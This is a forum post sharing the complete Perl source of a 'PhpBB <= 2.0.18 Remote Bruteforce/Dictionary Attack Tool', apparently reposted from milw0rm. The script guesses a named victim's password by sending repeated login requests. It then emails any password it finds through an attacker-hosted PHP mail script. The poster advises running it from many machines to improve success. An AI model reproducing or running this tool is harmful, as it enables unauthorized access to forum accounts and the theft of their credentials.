Hi all, i have just released an update of my tool Code: #!/usr/bin/perl #################################################################################################################### # Title: PhpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool # Type: Bruteforce / Dictionary attack # New demo: [url]http://rapidshare.de/files/13694254/phpbbbtr.avi.html[/url] (1.06 mb) # Php Email Script data: <? mail($destinataire, $objet, $contenu, "From: $expediteur\r\nReply-To: $expediteur"); ?> # Note: Host the php script and replace the line 34 [] Php script for the email option because win32 don't support Mail::Mailer # Changelog: Bruteforce option | Starting length | Email option | More fast | Die error disabled | # Credits: DarkFig # Greetz: Romano [] Pgeo [] Fred [] CrackJerem [] Volcom [] Ddxs [] The truth [] And all man who like me =) # Web: [url]http://disarm.free.fr/bo_hard/[/url] (english language accepted..we are french sorry^^) #################################################################################################################### use IO::Socket; use LWP::Simple; #_Utilisation_ if(@ARGV < 6){ print q( +---------------------------------------------------------------------------------------------------+ | PhpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool [~_~] by DarkFig | +---------------------------------------------------------------------------------------------------+ | Usage: phpbbbtr.pl <host> <path> <port> <attack> <char> <length> <victim> <log> <email> | +---------------------------------------------------------------------------------------------------+ | <host> | The host where the php flaw is installed | [Ex: victim.com] | | <path> | Path of the php flaw | [Ex: /vuln/] | | <port> | Port of the host | [Ex: 80] | | <attack> | Bruteforce[-btr] or Dictionary[-dict] | [Ex: -dict] | | <char> | Bruteforce[upperalpha, loweralpha, numeric] or Dictionary file | [Ex: dico.txt] | | <length> | For the bruteforce option, define a starting length | [Ex: 7] | | <victim> | The victim's username | [Ex: L4m3r] | | <log> | [Optional] File where you want to save the password | [Ex: results.txt] | | <email> | [Optional] Email where the password will be sent | [Ex: [email][email protected][/email]] | +---------------------------------------------------------------------------------------------------+ );exit;} #_Configuration_ $mailsite = "http://yoursite.com/mailme.php"; #Replace this value by the Url of the Php email script $shipper = "xploitdarkfigbot%40gmail.com"; #Default shipper email, [email][email protected][/email] really exist => It work ;) $host = $ARGV[0]; $path = $ARGV[1]; $port = $ARGV[2]; $attack = $ARGV[3]; $content = $ARGV[4]; if($attack eq "-btr"){$length = $ARGV[5];$username = $ARGV[6];$results = $ARGV[7];if(!$ARGV[9]){$mailoption = 0;} else {$mailoption = 1;$email = $ARGV[8];}} else {$username = $ARGV[5];$results = $ARGV[6];if(!$ARGV[7]){$mailoption = 0;} else {$mailoption = 1;$email = $ARGV[7];}} $nligne = "-1"; $postit = "$path"."login.php"; $full = "http://"."$host"."$path";&hello; #_Hello_ sub hello() { if($attack eq "-dict"){open dictionary, "<$content" || print " [-]Can't open the file.";chomp(@dico = <dictionary>);} print "\n +--------------------------------------------------------+ PhpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool +--------------------------------------------------------+ [+] Attack: ";if($attack eq "-btr"){print "Bruteforce";}if($attack eq "-dict"){print "Dictionary";};print" [+] Target: $full [+] Port: $port [+] Username: $username +--------------------------------------------------------+"; if($content eq "upperalpha"){$nligne = "A";} if($content eq "loweralpha"){$nligne = "a";} if($content eq "numeric"){$nligne = "0";} if($attack eq "-dict"){&dictio;}if($attack eq "-btr"){&generate;}} #_Bruteforce_ sub generate() { $nligne x= $length; $passwordz = $nligne; print "\n [~]Trying the password: $passwordz"; &phpbb;} sub btrfr() { $nligne++; $passwordz = $nligne; print "\n [~]Trying the password: $passwordz"; &phpbb;} #_Dictionary_ sub dictio() { $nligne++; $passwordz = $dico[$nligne]; if($passwordz eq ""){&successfailed;} print "\n [~]Trying the password: $passwordz"; &phpbb;} #_Socket_ sub phpbb(){ while ($OK ne 1){ $data = "username="."$username"."&password="."$passwordz"."&redirect=&login=Connexion"; $length = length $data; my $send = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "\n [-]Can't connect to the host."; print $send "POST $postit HTTP/1.1 Host: $host Content-Type: application/x-www-form-urlencoded Content-Length: $length $data"; read $send, $answer, 15; close($send); if($answer =~ /HTTP\/(.*?) 302/){$OK = 1;} &decision;}} #_Decision_ sub decision(){if($OK ne 1){if($attack eq "-dict"){&dictio;}if($attack eq "-btr"){&btrfr;}} else {&successfailed;}} #_Success/Failed_ sub successfailed(){ if($OK eq 1){print "\n [+]User: $username\n [+]Password: $passwordz";} if($OK eq 0){print "\n [-]User: $username\n [-]Password: Not found";} open FILE, ">$results" || print "\n [-]Can't write the file."; print FILE " +--------------------------------------------------------+ PhpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool +--------------------------------------------------------+ [+] Target: $full [+] Port: $port [+] Username: $username [+] Password: "; if($OK eq 1){print FILE "$passwordz";} if($OK eq 0){print FILE "Not found...";$passwordz = "Not found";} print FILE "\n+--------------------------------------------------------+\n"; close FILE; close dictionary; #_EmailOption_ if($mailoption eq 1){ $fullmailurl = "$mailsite"."?expediteur="."$shipper"."&destinataire="."$email"."&objet="."[Xploit]Results for $host"."&contenu="."Target: $full"."%0D%0A"."Port: $port"."%0D%0A"."Username: $username"."%0D%0A"."Password: $passwordz"; $mailpg = get($fullmailurl) || print "\n [-]Can't connect to the email script hoster.\n+--------------------------------------------------------+\n\n" and exit; print "\n [+]Email sent, check your mail !\n+--------------------------------------------------------+\n\n";} else {print "\n+--------------------------------------------------------+\n";}exit;} # milw0rm.com [2006-02-20] Yeah, the speed is not very high but if you execute it on a lot of box...you can have some success ++